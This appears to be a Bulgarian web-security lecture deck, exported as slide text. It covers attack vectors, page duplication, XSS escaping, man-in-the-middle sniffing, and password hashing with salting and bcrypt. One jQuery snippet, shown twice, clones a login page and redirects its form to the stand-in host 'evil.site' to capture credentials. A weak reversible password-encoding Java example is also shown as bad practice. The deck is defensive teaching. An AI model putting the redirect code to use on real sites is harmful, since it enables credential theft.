План
• Attack vectors
• Пароли
• Съвети
• Стената на срама
Slide 19
Slide 19 text
Attack vectors
Slide 20
Slide 20 text
An attack vector is a path or means by which a hacker (or cracker) can
gain access to a computer or website in order to deliver a payload or
malicious outcome. Attack vectors enable hackers to exploit system
vulnerabilities, including the human element.
Дублиране на страници
$.get(‘http://website.com/login’, function(html) {
$(‘body’).append(html);
$(‘form’).attr(‘action’, ‘http://evil.site/login’);
});
Slide 27
Slide 27 text
Дублиране на страници
$.get(‘http://website.com/login’, function(html) {
$(‘body’).append(html);
$(‘form’).attr(‘action’, ‘http://evil.site/login’);
});
Това точно няма да сработи заради Access Control Origin, но ако сървъра зареди html-a всичко ще е наред.
Slide 28
Slide 28 text
За съжаление не можем да направим
много, ...
Slide 29
Slide 29 text
освен да използваме HTTPS и да
насърчаваме потребителите да гледат URL-a.
Решението е лесно и ясно
& &
< <
> >
" "
' '
/ /
Slide 62
Slide 62 text
Докато не забравим
да го приложим някъде…
Slide 63
Slide 63 text
...или го дадем на някой плъгин,
който не го прави.
Slide 64
Slide 64 text
HTTP only cookies
Slide 65
Slide 65 text
Information leakage
Slide 66
Slide 66 text
No content
Slide 67
Slide 67 text
No content
Slide 68
Slide 68 text
Това е втората най-често използвана атака
Slide 69
Slide 69 text
Man-In-The-Middle attack
Slide 70
Slide 70 text
No content
Slide 71
Slide 71 text
Wi-Fi packet sniffing
(подушване на пакети)
Slide 72
Slide 72 text
Не, кучето Ви не може да подуши тези
пакети
Slide 73
Slide 73 text
Четене на некриптиран трафик
от и до публичен hotspot.
Включително пароли.
Slide 74
Slide 74 text
HTTPS
Slide 75
Slide 75 text
Пароли
Slide 76
Slide 76 text
Най-важното нещо,
след номерата на банкови карти
Slide 77
Slide 77 text
Защо точно паролите?
Slide 78
Slide 78 text
Потребителите са глупави...
(аз включително)
Slide 79
Slide 79 text
...преизползват пароли
Slide 80
Slide 80 text
“Passwords are never stored in plaintext. At
least they shouldn't be, unless you're
building the world's most insecure system
using the world's most naive programmers.”
- случаен човек в нета
Slide 81
Slide 81 text
protected String encodePassword(String password) {
String ref = "1U40ckjGEpdeil5xyde9STilbf237wzCKJoOdeilNILstnPMmQXYahVRgDAHuvrBFWZ1";
StringBuilder result = new StringBuilder();
for (int i = 0; i < password.length(); i ++) {
result.append(ref.charAt(ref.indexOf(password.charAt(i)) + 1));
}
return result.toString();
}
Slide 82
Slide 82 text
protected String decodePassword(String password) {
String ref = "1U40ckjGEpdeil5xyde9STilbf237wzCKJoOdeilNILstnPMmQXYahVRgDAHuvrBFWZ1";
ref = new StringBuilder(ref).reverse().toString();
StringBuilder result = new StringBuilder();
for (int i = 0; i < password.length(); i ++) {
result.append(ref.charAt(ref.indexOf(password.charAt(i)) + 1));
}
return result.toString();
}
Java
На един по-мощен настолен компютър
• MD5 – 8 000 000 000 пароли в секунда
• SHA1 – 3 000 000 000 пароли в секунда
• SHA256 – 1 100 000 000 пароли в секунда
Slide 92
Slide 92 text
8-символна парола от букви, цифри и
някои специални знаци
се краква за ~ 10 часа.
Slide 93
Slide 93 text
По-бързо ако използваме rainbow таблица
Slide 94
Slide 94 text
Или пък я има в някой речник
Slide 95
Slide 95 text
Или си пуснете няколко големи
Amazon EC2 GPU машини
http://du.nham.ca/blog/posts/2013/03/08/password-cracking-on-amazon-ec2/
https://www.cloudcracker.com
Slide 96
Slide 96 text
Трябва ни нещо по-добро
Slide 97
Slide 97 text
Хеш със сол
Slide 98
Slide 98 text
Уникална за конкретната парола добавка,
която я “разширява”.
Slide 99
Slide 99 text
Прави хеша уникален,
дори да има еднакви пароли
Slide 100
Slide 100 text
Обезсмисля rainbow таблиците и
забавя едновременни brute-force
атаки на много пароли
Slide 101
Slide 101 text
Малко е!
Slide 102
Slide 102 text
Решението?
Slide 103
Slide 103 text
BCrypt, PBKDF2, SCrypt
Slide 104
Slide 104 text
Осоляват и хешират много пъти
Slide 105
Slide 105 text
Параметризират “бавността” на хеширане
=> осъкатяват brute-force-a
8 000 000 SHA1 хешове без сол
http://blog.linkedin.com/2012/06/06/linkedin-member-passwords-compromised/
http://arstechnica.com/security/2012/06/8-million-leaked-passwords-connected-to-linkedin/
Slide 113
Slide 113 text
No content
Slide 114
Slide 114 text
Не е fail, но все пак – brute-force от 40 000 различни IP адреса.
https://github.com/blog/1698-weak-passwords-brute-forced
При неуспешен логин не казвайте кое е
грешно – мейла или паролата.
Slide 119
Slide 119 text
Потвърждавайте промяната на мейл
адреса и на стария мейл.
Slide 120
Slide 120 text
Защитавайте и backup сървърите
Slide 121
Slide 121 text
Блокирайте login формата
при определен брой неуспешни опити,
или показвайте captcha
Slide 122
Slide 122 text
Обновявайте си ОС-а на сървърите и
developer-ските машини
Slide 123
Slide 123 text
No content
Slide 124
Slide 124 text
Застрашени всички потребители на iOS, MacOS
http://www.cnet.com/news/apple-finally-fixes-gotofail-os-x-security-hole/
Slide 125
Slide 125 text
No content
Slide 126
Slide 126 text
No content
Slide 127
Slide 127 text
Застрашени (почти) всички потребители на Linux
http://arstechnica.com/security/2014/03/critical-crypto-bug-leaves-linux-hundreds-of-apps-open-to-eavesdropping/
https://www.gitorious.org/gnutls/gnutls/commit/6aa26f78150ccbdf0aec1878a41c17c41d358a3b